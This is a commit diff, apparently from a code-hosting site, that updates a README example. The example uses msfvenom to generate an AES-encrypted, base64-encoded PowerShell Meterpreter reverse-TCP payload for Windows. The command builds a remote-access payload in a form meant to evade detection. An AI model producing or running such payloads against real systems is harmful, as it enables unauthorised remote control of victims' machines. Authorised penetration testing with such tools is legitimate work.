Update README.md
This commit is contained in:
@@ -45,7 +45,8 @@ msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp \
|
|||||||
--encrypt aes256 \
|
--encrypt aes256 \
|
||||||
--encrypt-key "`openssl rand -hex 16`" \
|
--encrypt-key "`openssl rand -hex 16`" \
|
||||||
--encrypt-iv "`openssl rand -hex 8`" \
|
--encrypt-iv "`openssl rand -hex 8`" \
|
||||||
-f powershell -o file.ps1
|
-e cmd/powershell_base64 \
|
||||||
|
-f psh -o payload.ps1
|
||||||
```
|
```
|
||||||
## Usage
|
## Usage
|
||||||
### Short Help
|
### Short Help
|
||||||
|
|||||||
Reference in New Issue
Block a user